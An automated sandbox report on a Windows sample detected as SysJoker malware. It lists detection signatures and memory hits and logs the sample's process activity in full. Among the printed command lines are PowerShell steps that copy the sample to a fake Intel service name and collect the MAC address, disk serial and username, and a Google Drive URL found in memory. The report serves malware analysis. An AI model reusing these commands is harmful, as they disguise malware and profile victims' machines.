Joe Sandbox Cloud Pro Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report qtjRj8L3Rw

Overview

General Information

Sample Name:qtjRj8L3Rw (renamed file extension from none to exe)
Analysis ID:1708662
MD5:d90d0f4d6dad402b5d025987030cc87c
SHA1:fad66bdf5c5dc2c050cbc574832c6995dba086a0
SHA256:1ffd6559d21470c40dcf9236da51e5823d7ad58c93502279871c3fe7718c901c
Infos:

Most interesting Screenshot:

Detection

SysJoker
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected SysJoker
Antivirus / Scanner detection for submitted sample
Found detection on Joe Sandbox Cloud Basic
Antivirus detection for dropped file
Writes or reads registry keys via WMI
Encrypted powershell cmdline option found
Powershell drops PE file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • qtjRj8L3Rw.exe (PID: 5732 cmdline: "C:\Users\user\Desktop\qtjRj8L3Rw.exe" MD5: D90D0F4D6DAD402B5D025987030CC87C)
    • powershell.exe (PID: 5848 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" copy 'C:\Users\user\Desktop\qtjRj8L3Rw.exe' 'C:\ProgramData\SystemData\igfxCUIService.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • igfxCUIService.exe (PID: 4384 cmdline: "C:\ProgramData\SystemData\igfxCUIService.exe" MD5: D90D0F4D6DAD402B5D025987030CC87C)
      • powershell.exe (PID: 5312 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" getmac | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps1.txt' ; wmic path win32_physicalmedia get SerialNumber | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps2.txt' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 4564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • getmac.exe (PID: 3328 cmdline: C:\Windows\system32\getmac.exe MD5: 6AB605BD2223BFB2E55A466BE9816914)
        • WMIC.exe (PID: 3788 cmdline: "C:\Windows\System32\Wbem\WMIC.exe" path win32_physicalmedia get SerialNumber MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)
      • powershell.exe (PID: 4704 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $env:username | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\tempu.txt' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 4736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
qtjRj8L3Rw.exeJoeSecurity_SysJokerYara detected SysJokerJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\ProgramData\SystemData\igfxCUIService.exeJoeSecurity_SysJokerYara detected SysJokerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000000.532048911.0000000000C1A000.00000002.00020000.sdmpJoeSecurity_SysJokerYara detected SysJokerJoe Security
        00000007.00000000.643724739.0000000000D5A000.00000002.00020000.sdmpJoeSecurity_SysJokerYara detected SysJokerJoe Security
          00000007.00000002.828629700.0000000000D5A000.00000002.00020000.sdmpJoeSecurity_SysJokerYara detected SysJokerJoe Security
            00000000.00000002.644558837.0000000000C1A000.00000002.00020000.sdmpJoeSecurity_SysJokerYara detected SysJokerJoe Security
              Process Memory Space: qtjRj8L3Rw.exe PID: 5732JoeSecurity_SysJokerYara detected SysJokerJoe Security
                Click to see the 1 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                7.0.igfxCUIService.exe.d10000.0.unpackJoeSecurity_SysJokerYara detected SysJokerJoe Security
                  7.2.igfxCUIService.exe.d10000.0.unpackJoeSecurity_SysJokerYara detected SysJokerJoe Security
                    0.2.qtjRj8L3Rw.exe.bd0000.0.unpackJoeSecurity_SysJokerYara detected SysJokerJoe Security
                      0.0.qtjRj8L3Rw.exe.bd0000.0.unpackJoeSecurity_SysJokerYara detected SysJokerJoe Security

                        Sigma Overview

                        No Sigma rule has matched

                        Jbx Signature Overview

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection:

                        barindex
                        Antivirus / Scanner detection for submitted sampleShow sources
                        Source: qtjRj8L3Rw.exeAvira: detected
                        Antivirus detection for dropped fileShow sources
                        Source: C:\ProgramData\SystemData\igfxCUIService.exeAvira: detection malicious, Label: TR/Redcap.rjsiq
                        Source: qtjRj8L3Rw.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                        Source: qtjRj8L3Rw.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                        Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: 7_2_00D4B17F FindFirstFileExW,7_2_00D4B17F
                        Source: powershell.exe, 00000003.00000003.610253378.0000000002A0D000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                        Source: igfxCUIService.exe, 00000007.00000002.825495321.0000000000B8A000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?id=1W64PQQxrwY3XjBnv_QAeBQu-ePr537eu
                        Source: igfxCUIService.exe, 00000007.00000002.825495321.0000000000B8A000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?id=1W64PQQxrwY3XjBnv_QAeBQu-ePr537eu2
                        Source: igfxCUIService.exe, 00000007.00000002.825495321.0000000000B8A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                        System Summary:

                        barindex
                        Found detection on Joe Sandbox Cloud BasicShow sources
                        Source: qtjRj8L3RwJoe Sandbox Cloud Basic: Detection: malicious Score: 92Perma Link
                        Writes or reads registry keys via WMIShow sources
                        Source: C:\Windows\SysWOW64\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                        Source: C:\Windows\SysWOW64\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                        Source: C:\Windows\SysWOW64\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                        Source: C:\Windows\SysWOW64\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                        Source: C:\Windows\SysWOW64\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                        Source: C:\Windows\SysWOW64\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                        Source: C:\Windows\SysWOW64\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                        Source: C:\Windows\SysWOW64\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
                        Powershell drops PE fileShow sources
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\SystemData\igfxCUIService.exeJump to dropped file
                        Source: qtjRj8L3Rw.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exeCode function: 0_2_00BD11F00_2_00BD11F0
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exeCode function: 0_2_00BD68200_2_00BD6820
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exeCode function: 0_2_00C008200_2_00C00820
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exeCode function: 0_2_00BFE8520_2_00BFE852
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exeCode function: 0_2_00BFB99E0_2_00BFB99E
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exeCode function: 0_2_00C101920_2_00C10192
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exeCode function: 0_2_00BD52300_2_00BD5230
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exeCode function: 0_2_00BD66300_2_00BD6630
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exeCode function: 0_2_00C136600_2_00C13660
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exeCode function: 0_2_00C137800_2_00C13780
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exeCode function: 0_2_00BFB76C0_2_00BFB76C
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exeCode function: 0_2_00C11F1C0_2_00C11F1C
                        Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: 7_2_00D111F07_2_00D111F0
                        Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: 7_2_00D501927_2_00D50192
                        Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: 7_2_00D152307_2_00D15230
                        Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: 7_2_00D536607_2_00D53660
                        Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: 7_2_00D166307_2_00D16630
                        Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: 7_2_00D537807_2_00D53780
                        Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: 7_2_00D3B76C7_2_00D3B76C
                        Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: 7_2_00D508A97_2_00D508A9
                        Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: 7_2_00D3E8527_2_00D3E852
                        Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: 7_2_00D168207_2_00D16820
                        Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: 7_2_00D408207_2_00D40820
                        Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: 7_2_00D3B99E7_2_00D3B99E
                        Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: 7_2_00D379607_2_00D37960
                        Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: 7_2_00D4DDCF7_2_00D4DDCF
                        Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: 7_2_00D51F1C7_2_00D51F1C
                        Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: String function: 00D351F0 appears 53 times
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exeCode function: String function: 00BF51F0 appears 48 times
                        Source: qtjRj8L3Rw.exe, 00000000.00000002.644624889.0000000000C31000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameIGFXCUISERVICE.EXE^ vs qtjRj8L3Rw.exe
                        Source: qtjRj8L3Rw.exeBinary or memory string: OriginalFilenameIGFXCUISERVICE.EXE^ vs qtjRj8L3Rw.exe
                        Source: Joe Sandbox ViewDropped File: C:\ProgramData\SystemData\igfxCUIService.exe 1FFD6559D21470C40DCF9236DA51E5823D7AD58C93502279871C3FE7718C901C
                        Source: qtjRj8L3Rw.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\qtjRj8L3Rw.exe "C:\Users\user\Desktop\qtjRj8L3Rw.exe"
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" copy 'C:\Users\user\Desktop\qtjRj8L3Rw.exe' 'C:\ProgramData\SystemData\igfxCUIService.exe'
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exeProcess created: C:\ProgramData\SystemData\igfxCUIService.exe "C:\ProgramData\SystemData\igfxCUIService.exe"
                        Source: C:\ProgramData\SystemData\igfxCUIService.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" getmac | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps1.txt' ; wmic path win32_physicalmedia get SerialNumber | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps2.txt'
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\getmac.exe C:\Windows\system32\getmac.exe
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe "C:\Windows\System32\Wbem\WMIC.exe" path win32_physicalmedia get SerialNumber
                        Source: C:\ProgramData\SystemData\igfxCUIService.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $env:username | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\tempu.txt'
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" copy 'C:\Users\user\Desktop\qtjRj8L3Rw.exe' 'C:\ProgramData\SystemData\igfxCUIService.exe'Jump to behavior
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exeProcess created: C:\ProgramData\SystemData\igfxCUIService.exe "C:\ProgramData\SystemData\igfxCUIService.exe" Jump to behavior
                        Source: C:\ProgramData\SystemData\igfxCUIService.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" getmac | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps1.txt' ; wmic path win32_physicalmedia get SerialNumber | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps2.txt'Jump to behavior
                        Source: C:\ProgramData\SystemData\igfxCUIService.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $env:username | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\tempu.txt'Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\getmac.exe C:\Windows\system32\getmac.exeJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe "C:\Windows\System32\Wbem\WMIC.exe" path win32_physicalmedia get SerialNumberJump to behavior
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220112Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jmv4hq3u.jjj.ps1Jump to behavior
                        Source: temps1.txt.8.drBinary string: 5C-22-C6-13-4E-F9 \Device\Tcpip_{B8652DFC-E1F5-449D-BAE4-BFF4128DE918}
                        Source: classification engineClassification label: mal88.troj.evad.winEXE@16/11@0/0
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exeCode function: 0_2_00BDEC90 CoInitialize,CoCreateInstance,0_2_00BDEC90
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4736:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5868:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4564:120:WilError_01
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exeCode function: 0_2_00BD3FB0 LoadResource,LockResource,SizeofResource,0_2_00BD3FB0
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: qtjRj8L3Rw.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                        Source: qtjRj8L3Rw.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                        Source: qtjRj8L3Rw.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                        Source: qtjRj8L3Rw.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: qtjRj8L3Rw.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                        Source: qtjRj8L3Rw.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                        Source: qtjRj8L3Rw.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                        Source: qtjRj8L3Rw.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: qtjRj8L3Rw.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                        Source: qtjRj8L3Rw.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                        Source: qtjRj8L3Rw.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                        Source: qtjRj8L3Rw.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                        Source: qtjRj8L3Rw.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exeCode function: 0_2_00C15E0B push ecx; ret 0_2_00C15E1E
                        Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: 7_2_00D35234 push ecx; ret 7_2_00D35246
                        Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: 7_2_00D55E0B push ecx; ret 7_2_00D55E1E
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\SystemData\igfxCUIService.exeJump to dropped file
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\SystemData\igfxCUIService.exeJump to dropped file
                        Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: 7_2_00D360A8 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,7_2_00D360A8
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\qtjRj8L3Rw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
